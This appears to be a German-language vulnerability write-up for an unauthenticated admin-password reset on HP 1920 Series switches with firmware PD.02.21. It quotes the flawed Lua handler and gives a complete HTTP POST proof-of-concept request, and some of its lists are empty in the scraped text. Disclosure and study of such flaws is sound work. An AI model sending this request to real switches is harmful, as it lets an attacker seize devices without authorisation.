
Firmware-Version: PD.02.21
Betroffene Geräte: HP 1920 Series Smart Managed Switches
Dieses Repository dokumentiert eine kritische Schwachstelle zur Umgehung der Authentifizierung in HP 1920 Series Smart Managed Switches mit Firmware-Version PD.02.21. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, das Admin-Passwort ohne vorherige Authentifizierung zu ändern und dadurch die vollständige Kontrolle über das Gerät zu übernehmen.
Die Schwachstelle existiert im Skript /login/default_password_cfg.lua, das die Änderung des Standardpassworts für das Gerät übernimmt. Dieses Skript:
oldPwd mit dem Standardpasswort übereinstimmt (das leer/blank ist)Der entscheidende verwundbare Abschnitt in default_password_cfg.lua:
if (request_method == 'POST') then
-- No authentication or session checks!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- Proceeds to change password
-- ...
end
end
Dem Skript fehlen kritische Sicherheitskontrollen:
Ein Angreifer kann diese Schwachstelle mit einer einfachen HTTP-POST-Anfrage ausnutzen:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
Hinweis: Der Parameter oldPwd wird leer gelassen, da das Standardpasswort leer ist.
Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer:
Ich hatte noch keine Zeit zu recherchieren, wer diese Schwachstelle ursprünglich entdeckt hat. Ich veröffentliche hier nur einen Proof of Concept.
Diese Informationen werden ausschließlich zu Bildungszwecken bereitgestellt. Der Autor ist nicht verantwortlich für eine missbräuchliche Verwendung dieser Informationen. Holen Sie stets eine ordnungsgemäße Genehmigung ein, bevor Sie auf Schwachstellen testen.